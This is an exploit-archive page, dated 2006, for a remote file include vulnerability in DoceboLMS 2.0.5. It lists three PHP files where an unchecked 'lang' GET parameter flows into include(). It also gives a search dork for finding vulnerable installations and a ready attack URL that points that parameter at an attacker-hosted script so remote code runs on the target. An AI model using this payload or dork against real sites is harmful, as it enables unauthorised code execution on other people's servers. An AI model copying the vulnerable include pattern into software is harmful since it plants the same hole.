DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability
# Published : 2006-05-25
# Author : beford
# Previous Title : V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
# Next Title : APC ActionApps CMS 2.8.1 Remote File Include Vulnerabilities

Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?

# www.Syue.com [2006-05-25]